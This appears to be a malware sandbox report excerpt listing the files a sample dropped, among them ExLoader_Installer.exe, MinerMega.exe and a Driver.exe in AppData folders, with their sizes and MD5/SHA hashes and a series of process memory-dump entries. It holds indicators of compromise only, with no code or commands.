C:\Users\Admin\AppData\Roaming\1337\ExLoader_Installer.exe
Filesize
1.9MB

MD5
d6f47ae82987404e2af575692ed8bedb

SHA1
385e605f403d44359eecfe4b0643764c0fa871d2

SHA256
c602ffcaee1c9951134fa43b576c475ecd2240b5a1e4ffd49839278c69885b1e

SHA512
5c83b6a39b049a75c066b32a1b4497fc5abe3d1adae75795f934b7558f3654aeb9e6365102c06689bdc1f0f422b1a43cd91a11a76631a668dd6391dbf05680af

Download Submit
C:\Users\Admin\AppData\Roaming\1337\ExLoader_Installer.exe
Filesize
9.9MB

MD5
c2e29044af19443fc46dc60e4283ec53

SHA1
22848e774b98a54206b37b328d66a470266e8c83

SHA256
86e490ddb4aa5cac47c36605e8da461e7a6ef3c6d6a9013f2ce2d806b2db90d8

SHA512
0697327a4b81bb39bb6ac61a94671f5d9c2148b2159c1e6f3f8688757b82a2b656f9c2d2cb295e9e2c5fce01e41bf3f4747c96761200c70682d47d6a4f18e147

Download Submit
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe
Filesize
1.7MB

MD5
a4a9d8b15dc9462de0f86d50a9976e6f

SHA1
336f34da13d41dee933129b06d7bc848dc57c8cc

SHA256
b6d006ea246912f7b96e96ab7938402979c1d1188ed1bda607099e1dba89c06e

SHA512
33a158e53495195f6170884146b94ef1eaef3bdc5022bf0260c0b8eb957b35eaaf4115d624fba50b303d6f2d9239bf80f201a1ecaa7d3a28d5f79fdacbbb16aa

Download Submit
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe
Filesize
1.3MB

MD5
0736cf30c11e45362ee60cfafe97dc05

SHA1
fe0c4a857bcbbec958cef0b0ea3d3ae39c4f1c4d

SHA256
1527aed9532890db0bfc9156b45ed089d4741b5d0dfbd09699bd293ddecce201

SHA512
c973cb9c82e0af6de65ad8ac2f922b39b99b01e9ea472bd5125555799f7e47a552a38f05c0f41379c01a40a56fac7e289a289697caf881e400195c1f6d4a0dea

Download Submit
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe
Filesize
1.4MB

MD5
2c301a0aa7bed9e7726ced32b59fead8

SHA1
2e6185d69f706a1fd06cbed2d7a0caf5c406d03b

SHA256
356318e0f262fb1324eed0a6d8d62e22e34d50452e64ecd4b7bea21a221dcaac

SHA512
967eada5580eac398fd38bed87de98de34d29a54711250dd8b22f5521c6d571d4b77025e9bc26f39a2753c130d612f5f2fc0d465e26c653e532b8b87ba46fe16

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
3.6MB

MD5
7fb41085e05f6e883ec54d9938ae08f1

SHA1
9784fa594bb00e5151fa48a23ed129c5ac5daf39

SHA256
b5847523fcb3e7ff423d8bfcac05b7949628bcc369c7f0e951fdfc0b92fca111

SHA512
e387810650b3f20c3e6b30f2b8f7e60ff6c30a492eacc3504d13fe699a12193f3ff0621744cec82536b7499f042e1a2c9a7beb608f02b28f818e2b9afd6f4a4e

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
3.5MB

MD5
1b8feb17a73357428704eb5bd65ce0e9

SHA1
499583258ffe4453ab7dce98e4a37e14787efcd8

SHA256
da9e63e170d0e0b9c3007353432cc6b98444528ee187d718a447edf12a1c7b02

SHA512
e3bfa74bac21152ac0c602a5a358a2fc3b79a144d67845287b2e099c5ca46007a385e2f396f597ba202f4a21abdd1c54712efb0ee2d003d0ca394905bf56515c

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
3.8MB

MD5
e2f844f51fccb06bd0f48b8cf4da5e0a

SHA1
e9482493fe11c16349b2b805bfef4cdd460867ab

SHA256
c8ab85020aeff9661a61e1f45a4806541e05850183ce7d2876b7aae62a1732e1

SHA512
a7c6c5bd44466d2f1f5d5fb99bb0f4a0c52a5a8a10dc325fb65870d7583aa24620d48a26939177d80a3283693627ef8e1ad9ab27765da058cdb91d3348d65751

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
1.5MB

MD5
5a9851d74493b60204467ccebc9b4664

SHA1
4f7e03bf90d59901e661195e708af9b81ce0d05e

SHA256
c6d02b94964b8e963327773ff08908d01d2d7a8f237d66ff22b4e6189c53081a

SHA512
f812cacfd64467280ae772292f45eca6781ec84a14fa945f4967f83c507e39e21ebfb7dc6450eff9cfe3211f1de274148d64d2b3758688ee2c7bf3f4a1e04b33

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
C:\Users\Admin\AppData\Roaming\com.swiftsoft\ExLoader_Installer\shared_preferences.json
Filesize
246B

MD5
1e608dfa861e8940b640f98b528e1f26

SHA1
bb5075428a63de7822a6d90bf8fe7c626a442c1e

SHA256
2135f82e7894e132da0ee4aabf30a1dfd811b9b978b6f48e72b22864d3b5eebf

SHA512
80b37ced49f9079056039d93b76ef672b07d06676729b9824d0479e3717b0dde12136eb3341a8300d4105b606f387af55704f6d8ea660268d91381b27076f341

Download Submit
memory/1104-26-0x0000000000240000-0x000000000063E000-memory.dmp

Filesize
4.0MB

Download
memory/1104-1193-0x0000000074870000-0x0000000075020000-memory.dmp

Filesize
7.7MB

Download
memory/1104-1195-0x0000000004F50000-0x0000000004F60000-memory.dmp

Filesize
64KB

Download
memory/1104-27-0x0000000074870000-0x0000000075020000-memory.dmp

Filesize
7.7MB

Download
memory/1104-1172-0x00000000052C0000-0x0000000005326000-memory.dmp

Filesize
408KB

Download
memory/1104-1173-0x0000000004F50000-0x0000000004F60000-memory.dmp

Filesize
64KB

Download
memory/2564-1128-0x000001DC0EE90000-0x000001DC0FC8D000-memory.dmp

Filesize
14.0MB

Download
memory/2564-1130-0x000001DC0EE90000-0x000001DC0FC8D000-memory.dmp

Filesize
14.0MB

Download
memory/2564-1127-0x000001DC0EE60000-0x000001DC0EE61000-memory.dmp

Filesize
4KB

Download
memory/2564-1129-0x000001DC0EE90000-0x000001DC0FC8D000-memory.dmp

Filesize
14.0MB

Download
memory/2564-1131-0x000001DC0EE70000-0x000001DC0EE71000-memory.dmp

Filesize
4KB

Download
memory/3544-1202-0x0000000001F10000-0x0000000001F30000-memory.dmp

Filesize
128KB

Download
memory/3544-1204-0x0000000002070000-0x0000000002090000-memory.dmp

Filesize
128KB

Download
memory/3544-1191-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1192-0x0000000001EF0000-0x0000000001F10000-memory.dmp

Filesize
128KB

Download
memory/3544-1194-0x0000000001F10000-0x0000000001F30000-memory.dmp

Filesize
128KB

Download
memory/3544-1189-0x0000000001ED0000-0x0000000001EF0000-memory.dmp

Filesize
128KB

Download
memory/3544-1217-0x0000000001F30000-0x0000000001F50000-memory.dmp

Filesize
128KB

Download
memory/3544-1196-0x0000000001F30000-0x0000000001F50000-memory.dmp

Filesize
128KB

Download
memory/3544-1197-0x0000000002070000-0x0000000002090000-memory.dmp

Filesize
128KB

Download
memory/3544-1198-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1199-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1200-0x0000000001EF0000-0x0000000001F10000-memory.dmp

Filesize
128KB

Download
memory/3544-1218-0x0000000002070000-0x0000000002090000-memory.dmp

Filesize
128KB

Download
memory/3544-1201-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1203-0x0000000001F30000-0x0000000001F50000-memory.dmp

Filesize
128KB

Download
memory/3544-1190-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1205-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1206-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1207-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1208-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1209-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1210-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1211-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1212-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1213-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1214-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3544-1215-0x0000000001EF0000-0x0000000001F10000-memory.dmp

Filesize
128KB

Download
memory/3544-1216-0x0000000001F10000-0x0000000001F30000-memory.dmp

Filesize
128KB

Download
memory/4348-1183-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4348-1186-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4348-1185-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download